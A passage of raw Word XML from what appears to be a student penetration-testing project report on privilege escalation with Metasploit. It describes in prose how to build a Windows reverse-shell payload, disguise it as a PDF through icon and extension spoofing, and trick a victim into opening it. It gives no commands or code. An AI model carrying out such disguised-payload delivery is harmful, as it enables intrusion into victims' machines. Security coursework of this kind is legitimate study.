          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PRIVILEGE ESCALATION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2FD1">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB2424" w14:textId="581F6287" w:rsidR="00A65F61" w:rsidRDefault="00D15D28" w:rsidP="00640314">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A47E3C">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>Let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00A47E3C">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> understand Privilege Escalation first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A47E3C">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">So whenever an attacker(hacker) initially </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>gains foothold to the victim’s system then the shell that he got from the victim machine has lower permission/privileges</w:t>
      </w:r>
      <w:r w:rsidR="00A65DF0">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>like that of a normal user.</w:t>
      </w:r>
      <w:r w:rsidR="00A65DF0">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>So the activities of the attacker become limited</w:t>
      </w:r>
      <w:r w:rsidR="00A65DF0">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>.This will restrict the attacker to do works that need higher privilege.</w:t>
      </w:r>
      <w:r w:rsidR="00A65DF0">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege escalation denotes the process of escalating(moving up in the curve) the current privileges </w:t>
      </w:r>
      <w:r w:rsidR="00A65DF0">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">in order to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>gain higher privileges.</w:t>
      </w:r>
      <w:r w:rsidR="004A16CE">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">There are two kinds of Privilege Escalation techniques.First one is Horizontal Privilege Escalation and Second one is Vertical Privilege Escalation.Horizontal refers to escalate privilege of one user to the other,where both have same </w:t>
      </w:r>
      <w:r w:rsidR="0015548B">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>rights but other user have permissions to special applications.Where as vertical Privilege Escalation is moving from normal user to admin/root user.Now lets understand about Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D86D60" w14:textId="4A31D741" w:rsidR="004607B4" w:rsidRPr="004607B4" w:rsidRDefault="004607B4" w:rsidP="00A65F61">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004607B4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>METASPLOIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A897E8" w14:textId="4FCAD648" w:rsidR="0015548B" w:rsidRDefault="0015548B" w:rsidP="004F49A7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">Now lets understand about Metasploit.Metasploit is a big and one of the most popular framework </w:t>
      </w:r>
      <w:r w:rsidR="00C72925">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>used by penetration tester.It comes preinstalled in Kali Linux(Linux Distro used by most Pentesters).</w:t>
      </w:r>
      <w:r w:rsidR="006A23A0">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>This completer framework provides Information Gathering,Scanning,Exploit Development and many more.The framework consists of three main components.Msfconsole,Modules,Tools</w:t>
      </w:r>
      <w:r w:rsidR="00467F76">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>.The msfconsole is the command-line interface.Modules consists of scanner,payloads,exploits.Tools consists of different stand-alone tools used for different purposes.msfvenom is one of the most popular tool used as a stand-alone application for generating payload.</w:t>
      </w:r>
      <w:r w:rsidR="009E3717">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>Here we will be using Metasploit to detect the local privilege escalation vectors,after that we will try to exploit one of the.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C513B" w14:textId="72A537AC" w:rsidR="00467F76" w:rsidRDefault="00467F76" w:rsidP="00A65F61">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4755A943" w14:textId="3C4B38D8" w:rsidR="00467F76" w:rsidRDefault="00467F76" w:rsidP="00A65F61">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD09794" w14:textId="5953CBD3" w:rsidR="00467F76" w:rsidRDefault="00467F76" w:rsidP="00A65F61">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EBF4D4B" w14:textId="0C0528D1" w:rsidR="00467F76" w:rsidRDefault="00467F76" w:rsidP="00A65F61">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11582ACC" w14:textId="77777777" w:rsidR="00414BAA" w:rsidRDefault="00414BAA" w:rsidP="00B277C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7F32EB" w14:textId="7532B617" w:rsidR="00084883" w:rsidRPr="00DB2FD1" w:rsidRDefault="00450257" w:rsidP="00DB2FD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2FD1">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SCOPE OF THE PROJECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537FE8CF" w14:textId="009DE8C9" w:rsidR="00084883" w:rsidRPr="00084883" w:rsidRDefault="00084883" w:rsidP="00084883">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RELATED ACTIVITIES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE63A11" w14:textId="0A85BB8C" w:rsidR="00D47219" w:rsidRDefault="00414BAA" w:rsidP="00640314">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk103270693"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>Though the main aim of the project is to escalate our privileges(here vertical privilege escalation),</w:t>
      </w:r>
      <w:r w:rsidR="009E3717">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">we first have to gain the initial foothold to the victim’s system.Once we gain initial foothold to the system  with limited </w:t>
      </w:r>
      <w:r w:rsidR="0031080E">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidR="009E3717">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">privileges, we can attempt to escalate our privileges.Now our first plan is to gain initial foothold of the system.We will start </w:t>
      </w:r>
      <w:r w:rsidR="00D47219">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>crafting our payload for windows</w:t>
      </w:r>
      <w:r w:rsidR="00D96BB2">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D47219">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">We will craft windows payload </w:t>
      </w:r>
      <w:r w:rsidR="0030443F">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00D47219">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> an x64 architecture</w:t>
      </w:r>
      <w:r w:rsidR="0031080E">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0030443F">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">define the </w:t>
      </w:r>
      <w:r w:rsidR="009968C4" w:rsidRPr="009968C4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidR="0030443F">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r w:rsidR="009968C4" w:rsidRPr="009968C4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r w:rsidR="0030443F">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">,type of shell(we will attempt to gain reverse shell).When our payload will be ready we will </w:t>
      </w:r>
      <w:r w:rsidR="0031080E">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> integrate a pdf file and the created payload</w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>.Also w</w:t>
      </w:r>
      <w:r w:rsidR="0031080E">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">e will </w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">have to </w:t>
      </w:r>
      <w:r w:rsidR="0031080E">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">change the icon of the integrated file to </w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0031080E">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>pdf</w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> icon</w:t>
      </w:r>
      <w:r w:rsidR="0031080E">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>,so that the file became less suspicious.Now in order to make it look</w:t>
      </w:r>
      <w:r w:rsidR="009968C4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">ing like a </w:t>
      </w:r>
      <w:r w:rsidR="0031080E">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> genuine</w:t>
      </w:r>
      <w:r w:rsidR="009968C4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> pdf file we will spoofed the extension of the integrated file from .exe to .pdf(Initially the payload was in .exe format)</w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> and compress it</w:t>
      </w:r>
      <w:r w:rsidR="009968C4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>.Now our payload is finally ready.</w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we will deliver it to the victim </w:t>
      </w:r>
      <w:r w:rsidR="009968C4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">.We will social engineer the victim </w:t>
      </w:r>
      <w:r w:rsidR="004607B4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="004607B4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> downloa</w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="004607B4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">  the </w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r w:rsidR="004607B4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>.Now once the</w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> zip is extracted and the </w:t>
      </w:r>
      <w:r w:rsidR="004607B4">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>file is opened by the victim,the pdf content will be displayed but in the background the payload will get executed and we will get a reverse shell.</w:t>
      </w:r>
      <w:r w:rsidR="009134FA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we will </w:t>
      </w:r>
      <w:r w:rsidR="002B1E89">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>search for</w:t>
      </w:r>
      <w:r w:rsidR="009134FA">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t xml:space="preserve"> local vulnerabilities in the system.After that we will try to exploit one of them in order to gain higher privileges.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="59510F6B" w14:textId="7C0A3D73" w:rsidR="00D96BB2" w:rsidRDefault="00D96BB2" w:rsidP="00107FA9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96BB2">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RESOURCES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE465F4" w14:textId="39D631B4" w:rsidR="002B1E89" w:rsidRDefault="00602FE1" w:rsidP="00640314">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>The resource</w:t>
      </w:r>
      <w:r w:rsidR="00826B86">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>s that we are going to need in order to implement the project are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693D9344" w14:textId="5273EAF3" w:rsidR="00826B86" w:rsidRDefault="00826B86" w:rsidP="00640314">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00826B86">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>:One of the most famous linux distribution used for ethical hacking or Penetartion testing(Also known as Pentesting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CB5C05" w14:textId="06A8B020" w:rsidR="00826B86" w:rsidRDefault="00826B86" w:rsidP="00640314">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00826B86">
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Windows OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>Apart from kali, we will be using windows os inorder to make some modification to the raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B54DD55" w14:textId="3028EA53" w:rsidR="00E17944" w:rsidRDefault="00E17944" w:rsidP="00B277C5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>This comes under the tools section of the Metasploit.However this can be used as an standalone application in order to generate payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7427F345" w14:textId="1E98A252" w:rsidR="00E17944" w:rsidRDefault="00E17944" w:rsidP="00640314">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Metasploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins regular" w:hAnsi="Poppins regular" w:cs="Poppins Medium"/>
        </w:rPr>
        <w:t>It is a huge framework used for several purposes such as information gathering,scanning,exploitation.We will use this in order to listen for incoming connections as well as privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6097EFC4" w14:textId="77777777" w:rsidR="00B277C5" w:rsidRDefault="00B277C5" w:rsidP="00640314">
      <w:pPr>
